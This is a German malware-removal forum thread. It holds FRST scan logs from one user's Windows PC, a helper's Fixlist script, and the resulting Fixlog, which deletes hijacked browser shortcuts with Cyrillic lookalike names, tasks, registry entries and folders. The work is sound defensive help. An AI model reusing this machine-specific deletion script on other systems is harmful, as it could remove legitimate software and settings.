Description: Fehler beim Erstellen des Wiederherstellungspunkts (Prozess = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Beschreibung = Geplanter Prüfpunkt; Fehler = 0x80070422).

Error: (05/21/2017 06:31:04 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/21/2017 05:28:15 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.


Systemfehler:
=============
Error: (05/22/2017 08:56:04 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/22/2017 08:56:03 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Microsoft IdentityCRL Service" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/22/2017 08:53:14 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Der Server "{F9717507-6651-4EDB-BFF7-AE615179BCCF}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (05/22/2017 08:40:07 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/22/2017 08:40:06 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Microsoft IdentityCRL Service" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/22/2017 05:43:19 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/22/2017 05:43:18 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Microsoft IdentityCRL Service" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/22/2017 05:40:30 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Der Server "{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (05/22/2017 05:30:27 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Google Update-Dienst (gupdate)" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/22/2017 05:30:27 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Microsoft IdentityCRL Service" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.


CodeIntegrity:
===================================
  Date: 2017-05-22 20:54:09.182
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-22 20:53:14.626
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-22 20:38:11.867
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-22 18:12:13.676
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-22 17:41:24.419
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-22 17:28:31.122
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-22 06:49:09.816
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-21 20:13:51.338
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-21 20:05:35.868
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-21 19:47:06.708
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Prozentuale Nutzung des RAM: 31%
Installierter physikalischer RAM: 8087.41 MB
Verfügbarer physikalischer RAM: 5516.07 MB
Summe virtueller Speicher: 16473.01 MB
Verfügbarer virtueller Speicher: 13484.57 MB

==================== Laufwerke ================================

Drive c: (System) (Fixed) (Total:188.51 GB) (Free:107.16 GB) NTFS
Drive e: (Volume) (Fixed) (Total:681.96 GB) (Free:417.12 GB) NTFS
Drive f: () (Removable) (Total:1.91 GB) (Free:1.84 GB) FAT

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 236 GB) (Disk ID: 3EEEC186)
Partition 1: (Active) - (Size=6.2 GB) - (Type=27)
Partition 2: (Not Active) - (Size=229.8 GB) - (Type=05)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 698.6 GB) (Disk ID: 0E5EE332)
Partition 1: (Active) - (Size=2 GB) - (Type=27)
Partition 2: (Not Active) - (Size=696.6 GB) - (Type=OF Extended)

========================================================
Disk: 2 (Size: 1.9 GB) (Disk ID: 6DBE5409)
Partition 1: (Not Active) - (Size=1.9 GB) - (Type=06)

==================== Ende von Addition.txt ============================

--- --- ---

Hat etas länger gedauert dieses Mal. Aber der ADwCleaner hat sowohl Firefox als auch den Internet Explorer vom Rechner gelöscht, so dass ich mir erst eine Portabel Version für Firefox beorgen musste.

Gruß
Markus

burningice · 25.05.2017, 18:43

Die Browser wurden nicht gelöscht, sondern es wurden nur die versuchten Verlinkungen um Umleitungen, die du bislang benutzt hast, entfernt.

Schritt: 1
Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument

Code:

ATTFilter

closeprocesses:
Task: {09684BE9-6801-4ACC-A441-372E5344685D} - System32\Tasks\{FD46ED85-54A0-43DF-9695-7871B128BD8A} => pcalua.exe -a C:\Users\Markus\Downloads\msicuu2.exe -d C:\Users\Markus\Downloads
Task: {235BC95F-90C6-4A38-A70A-AE3C9F5D5481} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe 
Task: {B63B338D-2191-45D3-814B-CD40E4AF8882} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe 
Task: {B6CEEF38-5E00-4EAF-B77C-A1ABBD8D451B} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe 
Task: {BE571A95-F9AD-46C2-93D0-C2AE61480FCE} - \Plirisy -> Keine Datei <==== ACHTUNG
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехplorеr (Nо Add-оns).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gооgle Сhrоmе.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.emorhc.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnet Ехрlоrеr Вrowser.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnet Explorеr.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnet Eхplorеr (3).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Еxрlorеr (2).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzilla Firefоx.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.xoferif.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Public\Desktop\ZооmВrоwsеr EХ.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.resworbmooz.bat (Keine Datei) <===== Cyrillic
HKLM\...\Run: [emsisoft anti-malware] => "c:\program files\emsisoft anti-malware\a2guard.exe" /d=60
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\MountPoints2: {c5240729-fc2c-11e3-b801-c01885aadbce} - F:\DTVP_Launcher.exe
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\MountPoints2: {fd17f95e-28b3-11e2-b434-806e6f6e6963} - D:\wubi.exe
ShellIconOverlayIdentifiers: [MemopalBackedUp] -> {8ED3CC2D-6BC2-43AD-8C43-F51FBB413AE6} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers: [MemopalError] -> {B9CA6E12-7975-4997-B5BD-CA12ECE0FEAD} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers: [MemopalPartiallyBackedUp] -> {95DDC869-FC98-4D47-BD34-2EDC9AA09C01} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers: [MemopalToBackup] -> {2CDD871E-60EB-40BD-9721-A1CB57042F75} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalBackedUp] -> {8ED3CC2D-6BC2-43AD-8C43-F51FBB413AE6} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalError] -> {B9CA6E12-7975-4997-B5BD-CA12ECE0FEAD} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalPartiallyBackedUp] -> {95DDC869-FC98-4D47-BD34-2EDC9AA09C01} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalToBackup] -> {2CDD871E-60EB-40BD-9721-A1CB57042F75} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
BootExecute: autocheck autochk * sdnclean64.exe
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#/?show_is=1&source=art
SearchScopes: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> {C01A2B73-D42B-46F8-AFF0-E5207570AE93} URL = 
Toolbar: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> Kein Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  Keine Datei
Toolbar: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Keine Datei
S2  MicrosoftCRLSrv; C:\Windows\System32\svchost.exe [27648 2012-01-06] (Microsoft Corporation) <==== ACHTUNG (ServiceDLL nicht gefunden)
S2  MicrosoftCRLSrv; C:\Windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation) <==== ACHTUNG (ServiceDLL nicht gefunden)
R2 Avira Secure Backup Crawler; C:\Program Files\Avira Secure Backup\Avira Secure BackupCrawler.exe [2258000 2013-11-06] () [Datei ist nicht signiert]
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1812608 2011-12-28] ()
S3 clwvd; system32\DRIVERS\clwvd.sys [X]
folder: C:\Windows\SysWOW64\1111
folder: C:\Users\Markus\AppData\Local\{991DAACD-0AC8-4F88-9A36-26B7D28A3D35}
folder: C:\Users\Markus\AppData\Local\{D1FF043E-E888-4F8C-890F-409848E25675}
cmd: dir C:\Windows\SysWOW64
cmd: dir C:\Users\Markus\AppData\Local
emptytemp:

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).

Starte nun FRST erneut und klicke den Entfernen Button.
Das Tool erstellt eine Fixlog.txt.
Poste mir deren Inhalt.

Schritt: 2
Bitte starte wieder FRST, setze den Haken bei Addition und drücke auf Untersuchen. Poste bitte wieder die beiden Textdateien, die so entstehen.

MBJPaul · 25.05.2017, 21:10

Hier der Inhalt von Fixlog.txt:

Code:

ATTFilter

Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version: 24-05-2017
durchgeführt von Markus (25-05-2017 21:53:55) Run:1
Gestartet von C:\FRST\FRST-OlderVersion
Geladene Profile: Markus (Verfügbare Profile: Markus)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
closeprocesses:
Task: {09684BE9-6801-4ACC-A441-372E5344685D} - System32\Tasks\{FD46ED85-54A0-43DF-9695-7871B128BD8A} => pcalua.exe -a C:\Users\Markus\Downloads\msicuu2.exe -d C:\Users\Markus\Downloads
Task: {235BC95F-90C6-4A38-A70A-AE3C9F5D5481} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe 
Task: {B63B338D-2191-45D3-814B-CD40E4AF8882} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe 
Task: {B6CEEF38-5E00-4EAF-B77C-A1ABBD8D451B} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe 
Task: {BE571A95-F9AD-46C2-93D0-C2AE61480FCE} - \Plirisy -> Keine Datei <==== ACHTUNG
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехplorеr (Nо Add-оns).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gооgle Сhrоmе.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.emorhc.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnet Ехрlоrеr Вrowser.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnet Explorеr.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnet Eхplorеr (3).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Еxрlorеr (2).lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.erolpxei.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzilla Firefоx.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.xoferif.bat (Keine Datei) <===== Cyrillic
Shortcut: C:\Users\Public\Desktop\ZооmВrоwsеr EХ.lnk -> C:\Users\Markus\AppData\Roaming\Browsers\exe.resworbmooz.bat (Keine Datei) <===== Cyrillic
HKLM\...\Run: [emsisoft anti-malware] => "c:\program files\emsisoft anti-malware\a2guard.exe" /d=60
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => "C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe"
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\MountPoints2: {c5240729-fc2c-11e3-b801-c01885aadbce} - F:\DTVP_Launcher.exe
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\MountPoints2: {fd17f95e-28b3-11e2-b434-806e6f6e6963} - D:\wubi.exe
ShellIconOverlayIdentifiers: [MemopalBackedUp] -> {8ED3CC2D-6BC2-43AD-8C43-F51FBB413AE6} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers: [MemopalError] -> {B9CA6E12-7975-4997-B5BD-CA12ECE0FEAD} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers: [MemopalPartiallyBackedUp] -> {95DDC869-FC98-4D47-BD34-2EDC9AA09C01} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers: [MemopalToBackup] -> {2CDD871E-60EB-40BD-9721-A1CB57042F75} => C:\Program Files\Avira Secure Backup\ShellExtensionx64\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalBackedUp] -> {8ED3CC2D-6BC2-43AD-8C43-F51FBB413AE6} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalError] -> {B9CA6E12-7975-4997-B5BD-CA12ECE0FEAD} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalPartiallyBackedUp] -> {95DDC869-FC98-4D47-BD34-2EDC9AA09C01} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
ShellIconOverlayIdentifiers-x32: [MemopalToBackup] -> {2CDD871E-60EB-40BD-9721-A1CB57042F75} => C:\Program Files\Avira Secure Backup\ShellExtension\ShellExtension.dll [2013-11-06] ()
BootExecute: autocheck autochk * sdnclean64.exe
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxps://search.avira.net/#/?show_is=1&source=art
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#/?show_is=1&source=art
SearchScopes: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> {C01A2B73-D42B-46F8-AFF0-E5207570AE93} URL = 
Toolbar: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> Kein Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  Keine Datei
Toolbar: HKU\S-1-5-21-3526156030-524322557-4044303751-1001 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  Keine Datei
S2  MicrosoftCRLSrv; C:\Windows\System32\svchost.exe [27648 2012-01-06] (Microsoft Corporation) <==== ACHTUNG (ServiceDLL nicht gefunden)
S2  MicrosoftCRLSrv; C:\Windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation) <==== ACHTUNG (ServiceDLL nicht gefunden)
R2 Avira Secure Backup Crawler; C:\Program Files\Avira Secure Backup\Avira Secure BackupCrawler.exe [2258000 2013-11-06] () [Datei ist nicht signiert]
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1812608 2011-12-28] ()
S3 clwvd; system32\DRIVERS\clwvd.sys [X]
folder: C:\Windows\SysWOW64\1111
folder: C:\Users\Markus\AppData\Local\{991DAACD-0AC8-4F88-9A36-26B7D28A3D35}
folder: C:\Users\Markus\AppData\Local\{D1FF043E-E888-4F8C-890F-409848E25675}
cmd: dir C:\Windows\SysWOW64
cmd: dir C:\Users\Markus\AppData\Local
emptytemp:
         
*****************

Prozesse erfolgreich geschlossen.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{09684BE9-6801-4ACC-A441-372E5344685D} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{09684BE9-6801-4ACC-A441-372E5344685D} => Schlüssel erfolgreich entfernt
C:\Windows\System32\Tasks\{FD46ED85-54A0-43DF-9695-7871B128BD8A} => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{FD46ED85-54A0-43DF-9695-7871B128BD8A} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{235BC95F-90C6-4A38-A70A-AE3C9F5D5481} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{235BC95F-90C6-4A38-A70A-AE3C9F5D5481} => Schlüssel erfolgreich entfernt
C:\Windows\System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B63B338D-2191-45D3-814B-CD40E4AF8882} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B63B338D-2191-45D3-814B-CD40E4AF8882} => Schlüssel erfolgreich entfernt
C:\Windows\System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Safer-Networking\Spybot - Search and Destroy\Scan the system => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B6CEEF38-5E00-4EAF-B77C-A1ABBD8D451B} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B6CEEF38-5E00-4EAF-B77C-A1ABBD8D451B} => Schlüssel erfolgreich entfernt
C:\Windows\System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => erfolgreich verschoben
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Safer-Networking\Spybot - Search and Destroy\Check for updates => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BE571A95-F9AD-46C2-93D0-C2AE61480FCE} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BE571A95-F9AD-46C2-93D0-C2AE61480FCE} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plirisy => Schlüssel erfolgreich entfernt
C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Intеrnеt Ехplorеr (Nо Add-оns).lnk => erfolgreich verschoben
C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Gооgle Сhrоmе.lnk => erfolgreich verschoben
C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Lаunсh Intеrnet Ехрlоrеr Вrowser.lnk => erfolgreich verschoben
C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnet Explorеr.lnk => erfolgreich verschoben
C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnet Eхplorеr (3).lnk => erfolgreich verschoben
C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Intеrnеt Еxрlorеr (2).lnk => erfolgreich verschoben
C:\Users\Markus\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Моzilla Firefоx.lnk => erfolgreich verschoben
C:\Users\Public\Desktop\ZооmВrоwsеr EХ.lnk => erfolgreich verschoben
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\emsisoft anti-malware => Wert erfolgreich entfernt
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Software\Microsoft\Windows\CurrentVersion\Run\\SpybotPostWindows10UpgradeReInstall => Wert erfolgreich entfernt
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c5240729-fc2c-11e3-b801-c01885aadbce} => Schlüssel erfolgreich entfernt
HKCR\CLSID\{c5240729-fc2c-11e3-b801-c01885aadbce} => Schlüssel nicht gefunden. 
HKU\S-1-5-21-3526156030-524322557-4044303751-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fd17f95e-28b3-11e2-b434-806e6f6e6963} => Schlüssel erfolgreich entfernt
HKCR\CLSID\{fd17f95e-28b3-11e2-b434-806e6f6e6963} => Schlüssel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\MemopalBackedUp => Schlüssel erfolgreich entfernt
HKCR\CLSID\{8ED3CC2D-6BC2-43AD-8C43-F51FBB413AE6} => Schlüssel nicht gefunden. 
